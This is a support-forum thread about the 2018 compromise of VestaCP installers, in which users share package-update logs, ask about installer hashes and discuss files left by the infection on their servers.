All VestaCP installations being attacked Topic is solved
Re: All VestaCP installations being attacked
No, the repository information has not been updated.someuser wrote: ↑Thu Oct 18, 2018 10:45 amIt's Okay?Code: Select all
[root@vpszcka ~]# yum update vesta Loaded plugins: fastestmirror Loading mirror speeds from cached hostfile * base: mirror.hosting90.cz * epel: mirror.spreitzer.ch * extras: mirror.hosting90.cz * remi: remi.schlundtech.de * remi-php55: remi.schlundtech.de * remi-php56: remi.schlundtech.de * remi-safe: remi.schlundtech.de * remi-test: remi.schlundtech.de * updates: mirror.hosting90.cz No packages marked for update
Code: Select all
# yum clean all
# rm -rf /var/cache/yum
# yum update vesta\*Code: Select all
[root@vm2 ~]# yum info vesta
Loaded plugins: fastestmirror
Repodata is over 2 weeks old. Install yum-cron? Or run: yum makecache fast
Loading mirror speeds from cached hostfile
* base: centos.mirrors.ovh.net
* epel: mirror.freethought-internet.co.uk
* extras: centos.mirrors.ovh.net
* remi: rpms.remirepo.net
* remi-php56: rpms.remirepo.net
* remi-safe: rpms.remirepo.net
* remi-test: rpms.remirepo.net
* updates: centos.mirrors.ovh.net
Installed Packages
Name : vesta
Arch : x86_64
Version : 0.9.8
Release : 22
Size : 13 M
Repo : installed
From repo : vesta
Summary : Vesta Control Panel
URL : http://vestacp.com/
License : GPL
Description : This package contains the packages for Vesta Control Panel api.
[root@vm2 ~]# yum info vesta
Loaded plugins: fastestmirror
base | 3.6 kB 00:00
epel/x86_64/metalink | 26 kB 00:00
epel | 3.2 kB 00:00
extras | 3.4 kB 00:00
mariadb | 2.9 kB 00:00
nginx | 2.9 kB 00:00
remi | 2.9 kB 00:00
remi-debuginfo | 2.9 kB 00:00
remi-php55-debuginfo | 2.9 kB 00:00
remi-php56 | 2.9 kB 00:00
remi-php56-debuginfo | 2.9 kB 00:00
remi-safe | 2.9 kB 00:00
remi-test | 2.9 kB 00:00
remi-test-debuginfo | 2.9 kB 00:00
updates | 3.4 kB 00:00
vesta | 2.9 kB 00:00
(1/18): epel/x86_64/group_gz | 88 kB 00:00
(2/18): epel/x86_64/updateinfo | 933 kB 00:00
(3/18): base/7/x86_64/group_gz | 166 kB 00:00
(4/18): nginx/x86_64/primary_db | 35 kB 00:00
(5/18): epel/x86_64/primary | 3.6 MB 00:00
(6/18): extras/7/x86_64/primary_db | 204 kB 00:00
(7/18): remi-php55-debuginfo/x86_64/primary_db | 53 kB 00:00
(8/18): remi-debuginfo/x86_64/primary_db | 444 kB 00:00
(9/18): remi-php56-debuginfo/x86_64/primary_db | 53 kB 00:00
(10/18): remi/primary_db | 2.2 MB 00:00
(11/18): remi-php56/primary_db | 233 kB 00:00
(12/18): remi-test/primary_db | 580 kB 00:00
(13/18): remi-test-debuginfo/x86_64/primary_db | 115 kB 00:00
(14/18): mariadb/primary_db | 65 kB 00:00
(15/18): remi-safe/primary_db | 1.3 MB 00:00
(16/18): updates/7/x86_64/primary_db | 6.0 MB 00:00
(17/18): vesta/x86_64/primary_db | 83 kB 00:00
(18/18): base/7/x86_64/primary_db | 5.9 MB 00:01
Determining fastest mirrors
* base: centos.mirrors.ovh.net
* epel: epel.mirror.wearetriple.com
* extras: centos.mirrors.ovh.net
* remi: remi.mirror.ate.info
* remi-php56: remi.mirror.ate.info
* remi-safe: remi.mirror.ate.info
* remi-test: remi.mirror.ate.info
* updates: centos.mirrors.ovh.net
epel 12741/12741
Installed Packages
Name : vesta
Arch : x86_64
Version : 0.9.8
Release : 22
Size : 13 M
Repo : installed
From repo : vesta
Summary : Vesta Control Panel
URL : http://vestacp.com/
License : GPL
Description : This package contains the packages for Vesta Control Panel api.
Available Packages
Name : vesta
Arch : x86_64
Version : 0.9.8
Release : 23
Size : 2.6 M
Repo : vesta/x86_64
Summary : Vesta Control Panel
URL : http://vestacp.com/
License : GPL
Description : This package contains the packages for Vesta Control Panel api.
[root@vm2 ~]# yum update vesta\*
Loaded plugins: fastestmirror
Loading mirror speeds from cached hostfile
* base: centos.mirrors.ovh.net
* epel: epel.mirror.wearetriple.com
* extras: centos.mirrors.ovh.net
* remi: remi.mirror.ate.info
* remi-php56: remi.mirror.ate.info
* remi-safe: remi.mirror.ate.info
* remi-test: remi.mirror.ate.info
* updates: centos.mirrors.ovh.net
Resolving Dependencies
--> Running transaction check
---> Package vesta.x86_64 0:0.9.8-22 will be updated
---> Package vesta.x86_64 0:0.9.8-23 will be an update
---> Package vesta-nginx.x86_64 0:0.9.8-22 will be updated
---> Package vesta-nginx.x86_64 0:0.9.8-23 will be an update
---> Package vesta-php.x86_64 0:0.9.8-22 will be updated
---> Package vesta-php.x86_64 0:0.9.8-23 will be an update
--> Finished Dependency Resolution
Dependencies Resolved
============================================================================================================================
Package Arch Version Repository Size
============================================================================================================================
Updating:
vesta x86_64 0.9.8-23 vesta 2.6 M
vesta-nginx x86_64 0.9.8-23 vesta 297 k
vesta-php x86_64 0.9.8-23 vesta 12 M
Transaction Summary
============================================================================================================================
Upgrade 3 Packages
Total download size: 15 M
Is this ok [y/d/N]: y
Downloading packages:
Delta RPMs disabled because /usr/bin/applydeltarpm not installed.
(1/3): vesta-nginx-0.9.8-23.x86_64.rpm | 297 kB 00:00:00
(2/3): vesta-0.9.8-23.x86_64.rpm | 2.6 MB 00:00:01
(3/3): vesta-php-0.9.8-23.x86_64.rpm | 12 MB 00:00:01
----------------------------------------------------------------------------------------------------------------------------
Total 6.6 MB/s | 15 MB 00:00:02
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
Updating : vesta-php-0.9.8-23.x86_64 1/6
Updating : vesta-0.9.8-23.x86_64 2/6
Updating : vesta-nginx-0.9.8-23.x86_64 3/6
Cleanup : vesta-0.9.8-22.x86_64 4/6
Cleanup : vesta-php-0.9.8-22.x86_64 5/6
Cleanup : vesta-nginx-0.9.8-22.x86_64 6/6
Verifying : vesta-0.9.8-23.x86_64 1/6
Verifying : vesta-nginx-0.9.8-23.x86_64 2/6
Verifying : vesta-php-0.9.8-23.x86_64 3/6
Verifying : vesta-0.9.8-22.x86_64 4/6
Verifying : vesta-nginx-0.9.8-22.x86_64 5/6
Verifying : vesta-php-0.9.8-22.x86_64 6/6
Updated:
vesta.x86_64 0:0.9.8-23 vesta-nginx.x86_64 0:0.9.8-23 vesta-php.x86_64 0:0.9.8-23
Complete!
[root@vm2 ~]#
Re: All VestaCP installations being attacked
Do you publish MD5 hashes of installer files of each version somewhere or in release notes?
Let's say, if MD5 hashes of installer files uploaded to Github, everyone can help to track if the installer files got changed unintentionally.
Let's say, if MD5 hashes of installer files uploaded to Github, everyone can help to track if the installer files got changed unintentionally.
Re: All VestaCP installations being attacked
Debian installer still uses wget and c.vestacp.com for the configuration files.
Re: All VestaCP installations being attacked
fixed, thanks! https://github.com/serghey-rodin/vesta/ ... 1b8682bca9
Re: All VestaCP installations being attacked
The others operating system's installation scripts are still calling c.vestacp.com
Re: All VestaCP installations being attacked
As always. thank you for the hard work.
Re: All VestaCP installations being attacked
sorry to be the bummer here again, but this shows 'not infected' for a server IP of mine where the malicious installer (debian) has been used on 13th august. the server was not hacked at all, because I change the random password after install as already pointed out, but shouldn't it be on your list or database then?skid wrote: ↑Wed Oct 17, 2018 8:25 pmPlease check if your server IP here
>>>>> http://vestacp.com/test/?ip=127.0.0.1 <<<<<
care to clarify what your old notify script and how the strings got stored. as you obviously still have (a part) of that data, a bit more insight would be much appreciated.
I also like to know if there are more details on the timeframe. I doubt the aforementioned may/june to be correct, at least that's not fitting for what I see on debian boxes. from the looks of it on the latter the script has been tempered with end of july/beginning of august and was probably cleaned at some point in september when you finally noticed that something happened.
may is just the timestamp of the installer file, but that's either for the infected as for the original one - and doesn't give the installation date _at all_
open request to you, Serghey: simply stop playing hide and seek and report with a proper timeline of what happened when already. people are getting annoyed of vesta not because of the incidents, but because of the lack of response and information.
finally man up and defend your project the right way: by communicating quickly and ask for help if needed.
Re: All VestaCP installations being attacked
Falzo, stop the insults. We have all said in this thread.
More information you can find here
https://www.welivesecurity.com/2018/10/ ... installed/
In the next time I'll give you a warning.
More information you can find here
https://www.welivesecurity.com/2018/10/ ... installed/
In the next time I'll give you a warning.
Re: All VestaCP installations being attacked
Thank for the link in one of my servers I have the file /etc/init.d/dhcprenew and not the /usr/bin/dhcprenew, I also have multiple symlink that can be found using:imperio wrote: ↑Fri Oct 19, 2018 9:49 amFalzo, stop the insults. We have all said in this thread.
More information you can find here
https://www.welivesecurity.com/2018/10/ ... installed/
In the next time I'll give you a warning.
ls /etc/rc[1-5].d/
ls /etc/rc.d/rc[1-5].d/
I think I should reinstall the server.
Re: All VestaCP installations being attacked
You can clear you serverkandalf wrote: ↑Fri Oct 19, 2018 10:08 amThank for the link in one of my servers I have the file /etc/init.d/dhcprenew and not the /usr/bin/dhcprenew, I also have multiple symlink that can be found using:imperio wrote: ↑Fri Oct 19, 2018 9:49 amFalzo, stop the insults. We have all said in this thread.
More information you can find here
https://www.welivesecurity.com/2018/10/ ... installed/
In the next time I'll give you a warning.
ls /etc/rc[1-5].d/
ls /etc/rc.d/rc[1-5].d/
I think I should reinstall the server.
https://www.welivesecurity.com/2018/10/ ... installed/
Section
First stage
Persistence mechanism and link to Xor.DDoS